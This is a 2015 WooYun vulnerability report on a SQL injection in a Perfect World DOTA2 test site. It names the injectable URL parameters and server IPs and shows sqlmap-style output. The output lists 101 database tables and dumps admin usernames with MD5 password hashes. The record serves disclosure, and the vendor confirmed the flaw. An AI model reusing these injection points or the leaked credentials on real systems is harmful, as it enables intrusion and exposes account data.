当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137263

漏洞标题:完美世界DATA2某站SQL注入漏洞#二

相关厂商:完美世界

漏洞作者: M4sk

提交时间:2015-08-28 21:55

修复时间:2015-10-15 10:30

公开时间:2015-10-15 10:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-28: 细节已通知厂商并且等待厂商处理中
2015-08-31: 厂商已经确认,细节仅向厂商公开
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开

简要描述:

RT

详细说明:

准备收拾桌面睡觉....结果随手谷歌到一个url... 于是有了注入...
http://test.pwel.com.cn/EventsDota2/EventsDetailsArc4?cupId=
http://test.pwel.com.cn/MatchDota2/EventsDetailsArc2?userid=100013&userstr=1&cupId=1

test.pwel.com.cn  IP地址:122.228.79.123[浙江省温州市 电信]
games.pwel.com.cn IP地址:122.228.79.130[浙江省温州市 电信]


确定不是同一服务器 所以不影响之前提交的games.pwel.com.cn站的 所以审核大大别忽略咯
那么就看跑出来的数据~ 与之前的跑的数据也不一样哦~

1.png


Database: wmp_main
[101 tables]
+---------------------------------+
| tb_bid_dota2                    |
| tb_bug_feedback                 |
| tb_bug_feedback_copy            |
| tb_clients_info                 |
| tb_common_sequence              |
| tb_cup_dota2                    |
| tb_cup_match_log_dota2          |
| tb_cup_request_dota2            |
| tb_cup_round_dota2              |
| tb_cup_schedule_dota2           |
| tb_cup_schedule_ob_data2        |
| tb_cup_team_dota2               |
| tb_deploy_area                  |
| tb_deploy_host                  |
| tb_deploy_host_ip               |
| tb_deploy_line                  |
| tb_deploy_service               |
| tb_deploy_service_type          |
| tb_dota2_daomoney_log           |
| tb_dota2_hero_item              |
| tb_dota2_trade_data             |
| tb_dota2_trade_item             |
| tb_dota2_trade_knapsack         |
| tb_dota2_trade_log              |
| tb_event_game_match_dota2       |
| tb_game_illegal_app_records     |
| tb_game_map                     |
| tb_game_play_detail_dota        |
| tb_game_play_detail_dota2       |
| tb_game_play_detail_dota2_pub   |
| tb_game_play_detail_war3_1v1    |
| tb_game_play_detail_war3_2v2    |
| tb_game_play_dota               |
| tb_game_play_dota2              |
| tb_game_play_dota2_pub          |
| tb_game_play_war3_1v1           |
| tb_game_play_war3_2v2           |
| tb_game_room                    |
| tb_game_type                    |
| tb_global_dota2_code            |
| tb_guild                        |
| tb_guild_member                 |
| tb_guild_score_change_dota      |
| tb_guild_score_dota             |
| tb_log_dota2_honor_record       |
| tb_log_game_dota2               |
| tb_log_login                    |
| tb_log_match_stats              |
| tb_log_match_stats_dota2        |
| tb_log_online                   |
| tb_log_record                   |
| tb_prop_activity_dota2          |
| tb_prop_item_dota2              |
| tb_resource_dota_equip          |
| tb_resource_dota_hero           |
| tb_resource_dota_item           |
| tb_school                       |
| tb_school_member                |
| tb_school_score_change_dota     |
| tb_school_score_dota            |
| tb_school_score_dota2           |
| tb_setting_city                 |
| tb_setting_country              |
| tb_setting_dota2_bid_item       |
| tb_setting_dota2_hero           |
| tb_setting_dota2_honor_exchange |
| tb_setting_dota2_item           |
| tb_setting_global               |
| tb_setting_province             |
| tb_setting_public_notice        |
| tb_setting_shieldword           |
| tb_system_notice                |
| tb_team                         |
| tb_team_join_request            |
| tb_team_member                  |
| tb_team_score_change_dota       |
| tb_team_score_change_dota2      |
| tb_team_score_dota              |
| tb_team_score_dota2             |
| tb_user_account                 |
| tb_user_chip_dota2              |
| tb_user_code_dota2              |
| tb_user_favorite                |
| tb_user_friend                  |
| tb_user_friend_group            |
| tb_user_friend_group_member     |
| tb_user_hero                    |
| tb_user_hero_info_dota          |
| tb_user_offline_message         |
| tb_user_passport                |
| tb_user_prop_dota2              |
| tb_user_school_honour_dota2     |
| tb_user_score_dota              |
| tb_user_score_dota2             |
| tb_user_score_war3_1v1          |
| tb_user_score_war3_2v2          |
| tb_user_third_auth              |
| tb_user_visit                   |
| tb_web_downloads                |
| tb_web_records                  |
| tb_web_user_manage              |
+---------------------------------+


[23:45:11] [INFO] retrieved: f_user_name
[23:45:11] [INFO] retrieved: varchar(100)
[23:45:12] [INFO] retrieved: f_user_password
[23:45:12] [INFO] retrieved: varchar(100)
[23:45:13] [INFO] retrieved: admin
[23:45:13] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:13] [INFO] retrieved: dota2
[23:45:13] [INFO] retrieved: d090b14a557aa3e53580950a2005e657
[23:45:13] [INFO] retrieved: fengyu@wywk.cn
[23:45:14] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:14] [INFO] retrieved: jancy
[23:45:14] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:14] [INFO] retrieved: netfish
[23:45:14] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:15] [INFO] retrieved: netfish_1
[23:45:15] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:15] [INFO] retrieved: netfish_mg1
[23:45:15] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:16] [INFO] retrieved: panqianliang
[23:45:16] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:16] [INFO] retrieved: pwel
[23:45:16] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[23:45:16] [INFO] retrieved: wywk-大西洋店
[23:45:17] [INFO] retrieved: 6531401f9a6807306651b87e44c05751


数据都在这 危害你懂得 不继续了 困死了 审核大大求个前台吧 么么哒!

漏洞证明:

综上

修复方案:

你会的

版权声明:转载请注明来源 M4sk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-31 10:28

厂商回复:

感谢洞主对完美世界的关注,我们将尽快修补。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-28 22:25 | 路人毛 ( 实习白帽子 | Rank:48 漏洞数:15 | 呵呵)

    666666